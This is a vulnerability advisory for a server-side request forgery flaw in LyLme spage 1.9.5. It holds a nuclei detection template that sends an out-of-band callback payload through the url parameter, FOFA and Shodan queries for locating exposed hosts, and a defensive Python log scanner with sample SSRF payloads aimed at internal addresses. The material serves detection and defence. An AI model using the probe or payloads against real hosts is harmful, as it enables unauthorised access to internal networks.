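Vulnerability information
Vulnerability name: LyLme spage Server-Side Request Forgery Vulnerability
Vulnerability ID:
Vulnerability type: Server-side request forgery
Severity: High
Description: LyLme spage is a lightweight web service application widely used by individuals and small businesses to build simple websites. Version 1.9.5 contains a server-side request forgery (SSRF) vulnerability: through the url parameter of apply/index.php, an attacker can force the server to issue arbitrary requests. The root cause is insufficient validation and filtering of the user-supplied URL parameter, which lets an attacker use the server as a proxy to reach internal network resources or perform other malicious actions. Because SSRF lets an attacker bypass network boundary restrictions and reach internal services that are normally unreachable, it can lead to serious consequences such as sensitive information disclosure and attacks on internal services. The vulnerability can be exploited without authentication and can be automated, which increases its potential impact.
Vendor: lylme
Product: lylme_spage
Affected version: 1.9.5
Search query: title="lylme"
Source: https://github.com/projectdiscovery/nuclei-templates/blob/d3a9519c6e9ac22feb01e02546b6b5663245e11e/http%2Fcves%2F2024%2FCVE-2024-36675.yaml
Type: projectdiscovery/nuclei-templates:github issues
POC details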
```yaml
id: CVE-2024-36675

info:
  name: LyLme spage v1.9.5 - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    LyLme spage v1.9.5 is vulnerable to server-side request forgery (SSRF) via the url parameter in apply/index.php.
    An attacker can force the server to make arbitrary requests, potentially accessing internal resources.
  reference:
    - https://github.com/Hebing123/cve/issues/44
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36675
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-36675
    cwe-id: CWE-918
    cpe: cpe:2.3:a:lylme:lylme_spage:1.9.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lylme
    product: lylme_spage
    fofa-query: title="lylme"
    shodan-query: title="lylme"
  tags: cve,cve2024,ssrf,lylme,spage,oast

http:
  - method: GET
    path:
      - "{{BaseURL}}/apply/index.php?url=http://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(interactsh_protocol, "http")'
          - 'contains_all(body, "title\":", "icon\":")'
          - 'contains(content_type, "application/json")'
        condition: and
```
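For defenders reviewing web logs of a LyLme spage host, the following added example (not part of the nuclei template or of the LyLme project) flags requests to apply/index.php whose url parameter targets a loopback, private or link-local address, or uses a non-HTTP scheme. The log lines are constructed samples, and the function names `classify_target` and `scan` are assumptions made for this illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jun/2024:10:00:01 +0000] "GET /apply/index.php?url=http://127.0.0.1:8080/ HTTP/1.1" 200 87',
    '198.51.100.4 - - [01/Jun/2024:10:00:03 +0000] "GET /apply/index.php?url=http%3A%2F%2F10.0.0.5%2F HTTP/1.1" 200 91',
    '203.0.113.9 - - [01/Jun/2024:10:01:10 +0000] "GET /apply/index.php?url=https://example.com/ HTTP/1.1" 200 140',
    '203.0.113.9 - - [01/Jun/2024:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jun/2024:10:02:00 +0000] "GET /apply/index.php?url=ftp://192.0.2.10/ HTTP/1.1" 200 12',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_target(target):
    """Return a reason string if the url= value looks like SSRF, else None."""
    try:
        parts = urlsplit(target)
        host = parts.hostname or ""
    except ValueError:
        return "unparseable url"
    if parts.scheme.lower() not in ("http", "https"):
        return "non-http scheme"
    if host == "localhost" or host.endswith(".localhost"):
        return "loopback name"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None  # a hostname: review what it resolves to separately
    if ip.is_loopback or ip.is_private or ip.is_link_local:
        return "internal address"
    return None

def scan(lines):
    """Return (client_ip, target, reason) for each suspicious request line."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        req = urlsplit(m.group(1))
        if not req.path.endswith("/apply/index.php"):
            continue
        for target in parse_qs(req.query).get("url", []):  # percent-decoded
            reason = classify_target(target)
            if reason:
                findings.append((line.split()[0], target, reason))
    return findings
```

Hostnames are deliberately not resolved here so the check runs offline; a name that resolves to an internal address needs a separate lookup.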